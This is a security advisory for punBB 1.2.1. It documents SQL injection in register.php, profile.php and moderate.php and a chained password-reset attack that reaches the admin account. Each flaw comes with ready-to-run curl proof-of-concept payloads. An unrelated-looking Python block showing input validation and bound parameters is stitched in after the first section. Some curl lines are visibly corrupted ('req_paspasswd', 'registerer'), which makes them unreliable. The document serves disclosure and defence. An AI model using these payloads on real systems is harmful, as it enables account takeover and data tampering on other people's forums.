Multiple vulns in punBB
...
- Johannes Gumbel
=================================================
SQL Injections in punbb-1.2.1 register.php
=================================================
Description
-----------
A remote attacker can cause register.php to execute
arbitrary SQL statements by supplying malicious
values to the language or email parameter.
The email parameter is guarded by the function
is_valid_email, but this function doesn't do any
real filtering and will pass any SQL statement
that is formatted correctly.
This also affects systems using the magic_quotes_gpc
option in php.ini.
Proof of concept
----------------
This example only demonstrates the vulnerability in
the language parameter.
curl --form form_sent=1 --form req_username=sha --form req_password1=passwd
--form req_paspasswd --form req_email1=sha@xxxxxxxxx --form language="English',
'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer
This will create a user with the language English, style
Oxygen and IP address 0.0.0.0.
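As an added illustration (Python, not punBB code), the two fixes the register.php issue calls for: a whole-string e-mail check that rejects the quote/comment payloads shown above, an allow-list for the language field, and bound parameters so a value that slips through is stored as text instead of becoming part of the statement. The users table, the language list and the helper names are constructed for this example and are not punBB's schema.

```python
import re
import sqlite3

# Values constructed from the advisory's proof-of-concept requests.
LANGUAGE_PAYLOAD = "English', 'Oxygen', 0, '0.0.0.0', 0) -- "
EMAIL_PAYLOAD = "6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@xxxxxxxxx"

# Hypothetical allow-list of installed language packs (not punBB's own list).
ALLOWED_LANGUAGES = ("English", "German", "Swedish")

# Whole-string match: local part, one '@', dotted domain. Quotes, spaces and
# SQL comment sequences cannot appear anywhere in a value that passes.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def is_valid_email(value: str) -> bool:
    """Strict replacement for a permissive e-mail check (hypothetical, not punBB's)."""
    return _EMAIL_RE.fullmatch(value) is not None


def language_is_allowed(value: str) -> bool:
    """Free-form language input is compared against installed packs, not trusted."""
    return value in ALLOWED_LANGUAGES


def make_db() -> sqlite3.Connection:
    # Simplified, constructed users table; column names are not punBB's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, language TEXT, "
                 "style TEXT, registration_ip TEXT)")
    return conn


def register(conn, username: str, email: str, language: str) -> tuple:
    """Validate, then insert with bound parameters so values never reach the SQL parser."""
    if not is_valid_email(email):
        raise ValueError("invalid e-mail address")
    if not language_is_allowed(language):
        raise ValueError("unknown language pack")
    conn.execute("INSERT INTO users VALUES (?, ?, ?, 'Oxygen', '127.0.0.1')",
                 (username, email, language))
    return conn.execute("SELECT language, style, registration_ip FROM users "
                        "WHERE username = ?", (username,)).fetchone()


def bound_insert_keeps_payload_literal(conn) -> tuple:
    """Even without the allow-list, a bound parameter stores the payload as plain text."""
    conn.execute("INSERT INTO users VALUES (?, ?, ?, 'Oxygen', '127.0.0.1')",
                 ("probe", "probe@example.com", LANGUAGE_PAYLOAD))
    return conn.execute("SELECT language, registration_ip FROM users "
                        "WHERE username = 'probe'").fetchone()
```

With binding in place the registration_ip column keeps the server-supplied value and only one row is written, whereas the advisory's payload relied on closing the VALUES list itself.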
=======================================================
Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================
Description
-----------
A remote attacker without an account can set the password
of any user on the system to NULL, effectively shutting
them out of the system.
A user on the system can also inject an arbitrary
SQL statement using the change email feature. This has
occurred because of a fault in the is_valid_email function,
which returns true for strings that are not even close to
being a valid email.
This also affects systems using the magic_quotes_gpc
option in php.ini.
By combining these two an attacker with an account on
the forum can change the password for any user to anything
he/she wants to, gaining full access to the administrator
account.
Proof of concept
----------------
Examples of the damage the DoS attack and the arbitrary
SQL statement attack can do on their own have been
omitted. This is a demonstration of their power when
combined.
Assumptions for this particular example:
- There is a user on the system with id 3 that has
username/password set to 'sha'/'passwd'.
- The cookie is valid for sha on the system.
- The system supports sha1.
- The new password for the id 2 account is supposed to
be 'newpass'.
curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form
req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@xxxxxxxxx"
http://target/profile.php?action=change_email\&id=3
This will push the sha1 hash of the password 'newpass'
into every user's activate_string field. All that needs
to be done is pushing this field into the password field
of any user we want using the other bug.
curl http://target/profile.php?action=change_pass\&id=2\&key=
Now the account with user id 2 has the password 'newpass' set.
==============================================
SQL Injections in punbb-1.2.1 moderate.php
==============================================
Description
-----------
Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.
This also affects systems using the magic_quotes_gpc
option in php.ini.
Proof of concept
----------------
These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted such that simply adding a ;
or ' just before the comment "-- this won't show"
will cause the SQL query to fail, demonstrating that
the injection is possible.
Assumptions:
- punbb_cookie contains identification of a
moderator for forum with id 1.
Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show"
--form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie>
target/moderate.php?fid=1\&tid=1
Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show"
--form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie
punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show"
--form delete_topics=1 --form delete_topics_comply=1 --cookie
punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks open/close:
curl --referer http://target/moderate.php --form "topics[0) -- this won't
show]=" --form open=1 --cookie "punbb_cookie=<valid cookie>"
target/moderate.php?fid=1